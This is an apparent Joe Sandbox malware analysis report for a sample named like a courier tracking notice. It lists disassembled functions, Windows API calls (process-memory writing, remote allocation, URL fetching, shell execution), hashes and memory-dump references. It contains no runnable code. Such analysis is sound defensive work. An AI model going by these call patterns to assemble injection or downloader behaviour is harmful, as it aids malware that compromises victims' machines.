                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                      Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                      • String ID:
                                      • API String ID: 4247068974-0
                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                      Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )$U$\
                                      • API String ID: 0-3705770531
                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                      Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                      • CoUninitialize.OLE32 ref: 0046E53D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                      Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                      Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                      Download Yara Rule
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 708495834-557222456
                                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                      Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                      • CoUninitialize.OLE32 ref: 0047863C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                      Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                      Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$]$h
                                      • API String ID: 4104443479-3262404753
                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                      Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                      • String ID: <$@
                                      • API String ID: 2417854910-1426351568
                                      • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                      • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                      Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3705125965-3916222277
                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                      Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                      Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                      Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
